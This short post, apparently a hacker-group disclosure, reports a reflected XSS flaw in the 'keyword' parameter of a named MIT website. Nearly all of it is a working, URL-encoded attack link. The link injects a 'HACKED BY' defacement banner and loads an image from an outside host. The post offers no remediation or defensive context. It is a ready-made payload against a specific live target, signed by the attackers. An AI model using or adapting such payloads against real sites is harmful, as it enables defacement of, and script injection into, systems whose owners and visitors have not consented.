Reflected XSS vulnerability found in MIT's optimization.mit.edu site. The vulnerable field is the 'keyword' URL parameter.

Here is a sample XSS attack:
http://optimization.mit.edu/classkey.php?keyword=%3Chtml%3E+%3Cbody%3E++%3Ch1%3EHACKED+BY%20r3sist3r%20and%20striker%20Indishell%3C%2Fh1%3E+%3Cimg+border%3D%220%22+src%3D%22http%3A%2F%2Fwww.nation.com.pk%2Fdigital_images%2F480%2F2012-01-10%2Findian-hackers-fell-dgpr-website-1326191046-2428.jpg%22%3E++%3C%2Fbody%3E+%3C%2Fhtml%3E